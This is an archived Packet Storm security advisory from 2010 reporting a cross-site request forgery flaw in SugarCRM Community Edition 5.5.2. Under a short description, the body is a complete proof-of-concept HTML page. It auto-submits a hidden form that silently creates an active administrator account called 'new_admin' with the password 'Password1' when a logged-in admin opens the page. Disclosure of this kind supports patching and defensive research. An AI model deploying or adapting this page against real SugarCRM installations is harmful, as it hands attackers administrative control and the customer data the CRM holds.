SugarCRM Community Edition 5.5.2 Cross Site Request Forgery

2010-05-30T00:00:00
ID PACKETSTORM:90090
Type packetstorm
Reporter AutoSec Tools
Modified 2010-05-30T00:00:00

Description

                                        
                                            `<!--=========================================================================================================#  
# _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ #  
# /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ #  
# ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) #  
# /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ #  
# \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ #  
# )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ #  
# \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ #  
# #  
#============================================================================================================#  
# #  
# Vulnerability............Cross-site Request Forgery #  
# Software.................SugarCRM Community Edition 5.5.2 #  
# Download.................http://www.sugarcrm.com/crm/download/sugar-suite.html #  
# Date.....................5/30/10 #  
# #  
#============================================================================================================#  
# #  
# Site.....................http://cross-site-scripting.blogspot.com/ #  
# Email....................john.leitch5@gmail.com #  
# #  
#============================================================================================================#  
# #  
# ##Description## #  
# #  
# A cross-site request forgery vulnerability in SugarCRM Community Edition 5.5.2 can be exploited to create #  
# a new admin. #  
# #  
# #  
# ##Proof of Concept## #  
# -->  
<html>  
<body onload="document.forms[0].submit()">  
<form method="POST" action="http://192.168.1.4/sugarcrm/index.php">  
<input type="hidden" name="display_tabs_def" value="display_tabs[]=Home&display_tabs[]=Dashboard&display_tabs[]=Calendar&display_tabs[]=Activities&display_tabs[]=Leads&display_tabs[]=Contacts&display_tabs[]=Accounts&display_tabs[]=Opportunities&display_tabs[]=Emails&display_tabs[]=Campaigns&display_tabs[]=Cases&display_tabs[]=Documents&" />  
<input type="hidden" name="hide_tabs_def" value="" />  
<input type="hidden" name="remove_tabs_def" value="" />  
<input type="hidden" name="module" value="Users" />  
<input type="hidden" name="record" value="" />  
<input type="hidden" name="action" value="Save" />  
<input type="hidden" name="page" value="EditView" />  
<input type="hidden" name="return_module" value="Users" />  
<input type="hidden" name="return_id" value="" />  
<input type="hidden" name="return_action" value="DetailView" />  
<input type="hidden" name="password_change" value="true" />  
<input type="hidden" name="required_password" value="1" />  
<input type="hidden" name="user_name" value="" />  
<input type="hidden" name="type" value="" />  
<input type="hidden" name="is_group" value="0" />  
<input type="hidden" name="portal_only" value="" />  
<input type="hidden" name="is_admin" value="1" />  
<input type="hidden" name="is_current_admin" value="1" />  
<input type="hidden" name="required_email_address" value="0" />  
<input type="hidden" name="sugar_user_name" value="new_admin" />  
<input type="hidden" name="unique_name" value="" />  
<input type="hidden" name="first_name" value="" />  
<input type="hidden" name="status" value="Active" />  
<input type="hidden" name="last_name" value="a" />  
<input type="hidden" name="UserType" value="Administrator" />  
<input type="hidden" name="old_password" value="" />  
<input type="hidden" name="new_password" value="Password1" />  
<input type="hidden" name="confirm_new_password" value="Password1" />  
<input type="hidden" name="emailAddressWidget" value="1" />  
<input type="hidden" name="emailAddress0" value="" />  
<input type="hidden" name="emailAddressPrimaryFlag" value="emailAddress0" />  
<input type="hidden" name="emailAddressVerifiedFlag0" value="true" />  
<input type="hidden" name="emailAddressVerifiedValue0" value="" />  
<input type="hidden" name="useEmailWidget" value="true" />  
<input type="hidden" name="email_link_type" value="sugar" />  
<input type="hidden" name="mail_smtpuser" value="" />  
<input type="hidden" name="mail_smtppass" value="" />  
<input type="hidden" name="employee_status" value="Active" />  
<input type="hidden" name="title" value="" />  
<input type="hidden" name="phone_work" value="" />  
<input type="hidden" name="department" value="" />  
<input type="hidden" name="phone_mobile" value="" />  
<input type="hidden" name="reports_to_name" value="" />  
<input type="hidden" name="reports_to_id" value="" />  
<input type="hidden" name="phone_other" value="" />  
<input type="hidden" name="phone_fax" value="" />  
<input type="hidden" name="phone_home" value="" />  
<input type="hidden" name="messenger_type" value="" />  
<input type="hidden" name="messenger_id" value="" />  
<input type="hidden" name="address_street" value="" />  
<input type="hidden" name="address_city" value="" />  
<input type="hidden" name="address_state" value="" />  
<input type="hidden" name="address_postalcode" value="" />  
<input type="hidden" name="address_country" value="" />  
<input type="hidden" name="description" value="" />  
<input type="hidden" name="receive_notifications" value="12" />  
<input type="hidden" name="export_delimiter" value="," />  
<input type="hidden" name="mailmerge_on" value="0" />  
<input type="hidden" name="reminder_time" value="60" />  
<input type="hidden" name="default_export_charset" value="ISO-8859-1" />  
<input type="hidden" name="user_max_tabs" value="12" />  
<input type="hidden" name="user_max_subtabs" value="12" />  
<input type="hidden" name="user_subpanel_tabs" value="on" />  
<input type="hidden" name="dateformat" value="m/d/Y" />  
<input type="hidden" name="currency" value="-99" />  
<input type="hidden" name="timeformat" value="H:i" />  
<input type="hidden" name="default_currency_significant_digits" value="2" />  
<input type="hidden" name="timezone" value="Africa/Abidjan" />  
<input type="hidden" name="ut" value="0" />  
<input type="hidden" name="num_grp_sep" value="," />  
<input type="hidden" name="default_locale_name_format" value="s f l" />  
<input type="hidden" name="dec_sep" value="." />  
<input type="hidden" name="calendar_publish_key" value="" />  
<input type="hidden" name="outboundtest_from_address" value="" />  
</form>  
</body>  
</html>  
`